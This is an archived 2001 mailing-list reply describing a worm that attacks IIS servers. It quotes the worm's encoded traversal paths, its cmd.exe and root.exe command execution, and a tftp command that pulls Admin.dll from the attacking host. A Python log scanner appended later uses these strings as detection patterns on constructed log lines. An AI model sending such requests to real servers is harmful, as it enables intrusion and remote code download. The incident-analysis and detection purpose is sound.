Re: New worm ??

From: Jay D. Dyson (jdysonat_private)
Date: Tue Sep 18 2001 - 09:14:47 PDT


    
    On Tue, 18 Sep 2001, Cory McIntire wrote:
    
    > I and a few others I know are getting bombarded on our machines with IIS
    > requests....looks like another worm, and it's much smarter than before,
    > it seems to stay within the same class A and sometimes the same class B
    > as the attacking machine is in. Here is an excerpt of what I believe is
    > the full scan.... 
    
    	Here's what I've been able to determine thus far:
    
    	There is an e-mail worm propagating right now that comes with the
    payload 'readme.exe'.  I suspect this e-mail worm preys on Outlook MUAs,
    but I have no confirmation of this since the e-mails I've received have
    been bounces.  (Whoever released one iteration of this worm has the "From"
    address as 'staffat_private'.)
    
    	This payload does a load of things to assure its propagation.
    However, it differs from other email-based worms in that it also launches
    a number of web-based attacks.  Namely:
    
    /scripts
    /MSADC
    /scripts/..%255c..
    /_vti_bin/..%255c../..%255c../..%255c..
    /_mem_bin/..%255c../..%255c../..%255c..
    /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
    /scripts/..%c1%1c..
    /scripts/..%c0%2f..
    /scripts/..%c0%af..
    /scripts/..%c1%9c..
    /scripts/..%%35%63..
    /scripts/..%%35c..
    /scripts/..%25%35%63..
    /scripts/..%252f..
    /root.exe?/c+
    /winnt/system32/cmd.exe?/c+
    net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
    tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
    
    	As can be seen above, it also attempts to make a tftp retrieval
    for Admin.dll.
    
    	*sigh*  Yet another worm made possible by the insecurity of
    Microsoft.
    
    - -Jay
    
      (    (                                                          _______
      ))   ))   .--"There's always time for a good cup of coffee"--.   >====<--.
    C|~~|C|~~| (>------ Jay D. Dyson -- jdysonat_private ------<) |    = |-'
     `--' `--'  `-- What doesn't kill us only makes us stronger. --'  `------'
    
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
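Taking the probe strings quoted above as signatures, here is an added log-scanning example (my own code, not from the post or from any worm analysis) that flags those request patterns in a web server access log: it undoes single and double percent-encoding so the `%255c` / `%%35%63` variants resolve to a separator, matches the overlong UTF-8 pairs on the raw path, and spots the `root.exe`/`cmd.exe` command execution and the `tftp ... GET Admin.dll` fetch. The log lines are constructed, and I assume the `%%`/`%s` in the excerpt are format placeholders for `%20` and the attacking host's address in the on-wire request.

```python
import re
from urllib.parse import unquote

# Constructed Common Log Format lines (not from the original post): a normal request from
# 10.0.0.5, then probes from 10.0.7.9 modelled on the request strings quoted in the post.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Sep/2001:09:01:12 -0700] "GET /index.html HTTP/1.0" 200 1043
10.0.7.9 - - [18/Sep/2001:09:02:01 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 210
10.0.7.9 - - [18/Sep/2001:09:02:02 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 210
10.0.7.9 - - [18/Sep/2001:09:02:03 -0700] "GET /scripts/root.exe?/c+tftp%20-i%2010.0.7.9%20GET%20Admin.dll HTTP/1.0" 404 210
10.0.7.9 - - [18/Sep/2001:09:02:04 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 210
"""

CLF = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "\S+ (?P<path>\S+)[^"]*"')

# Indicators derived from the probe list in the post, each applied either to the raw path or
# to the repeatedly percent-decoded path. Overlong UTF-8 pairs (%c0%af, %c1%1c, ...) are matched
# raw because they do not decode to a separator outside the vulnerable IIS decoder.
INDICATORS = [
    ("cmd-exec", re.compile(r"/(root|cmd)\.exe\?/c\+", re.I), "raw"),                 # root.exe?/c+  cmd.exe?/c+
    ("dot-dot-traversal", re.compile(r"\.\.[\\/]"), "decoded"),                        # ..\ or ../ after decoding
    ("overlong-utf8-traversal", re.compile(r"\.\.%c[01]%[0-9a-f]{2}", re.I), "raw"),   # ..%c0%af..  ..%c1%9c..
    ("tftp-admin-dll", re.compile(r"tftp\s+-i\s+\S+\s+get\s+admin\.dll", re.I), "decoded"),  # tftp -i <host> GET Admin.dll
]

def decode_fully(path, rounds=3):
    # Decode until stable: %255c -> %5c -> '\', %%35%63 -> %5c -> '\', %252f -> %2f -> '/'.
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def classify(path):
    """Return the sorted list of indicator labels a request path trips (empty if none)."""
    views = {"raw": path, "decoded": decode_fully(path)}
    return sorted(label for label, rx, view in INDICATORS if rx.search(views[view]))

def scan_log(text):
    """Return (source ip, path, labels) for every log line that trips at least one indicator."""
    hits = []
    for line in text.splitlines():
        m = CLF.match(line)
        if m and (labels := classify(m.group("path"))):
            hits.append((m.group("ip"), m.group("path"), labels))
    return hits
```

Grouping the hits by source address is what turns this into the per-network view Cory describes, since one host emitting the whole probe list is a scanner rather than a mistyped URL.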
    



    This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 10:44:44 PDT